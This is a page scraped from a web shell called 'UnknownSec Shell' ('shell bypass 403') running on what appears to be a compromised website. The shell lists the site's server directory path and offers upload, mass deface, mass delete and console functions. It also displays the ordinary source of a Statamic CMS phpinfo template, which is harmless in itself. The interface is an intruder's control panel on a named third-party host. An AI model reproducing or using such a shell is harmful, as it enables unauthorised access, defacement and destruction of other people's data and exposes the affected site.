shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
resources
/
views
/
utilities
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
phpinfo.blade.php
@php use function Statamic\trans as __; @endphp @extends('statamic::layout') @section('title', __('PHP Info')) @section('content') <header class="mb-6"> @include('statamic::partials.breadcrumb', [ 'url' => cp_route('utilities.index'), 'title' => __('Utilities') ]) <h1>{{ __('PHP Info') }}</h1> </header> <div class="card p-0" dir="ltr"> <table class="data-table ltr:text-left"> <tr> <th class="rtl:pr-4 ltr:pl-4 py-2 w-1/4">{{ __('PHP Version') }}</th> <td>{{ PHP_VERSION }}</td> </tr> </table> </div> @foreach ($phpinfo as $section => $items) <h2 class="mt-8 mb-2 font-bold text-lg" dir="ltr">{{ $section }}</h2> <div class="card p-0" dir="ltr"> <table class="data-table ltr:text-left"> @foreach ($items as $name => $value) <tr> <th class="rtl:pr-4 ltr:pl-4 py-2 w-1/4">{{ $name }}</th> <td class="break-all">{{ is_array($value) ? join(', ', $value) : $value }}</td> </tr> @endforeach </table> </div> @endforeach @stop
© 2026 UnknownSec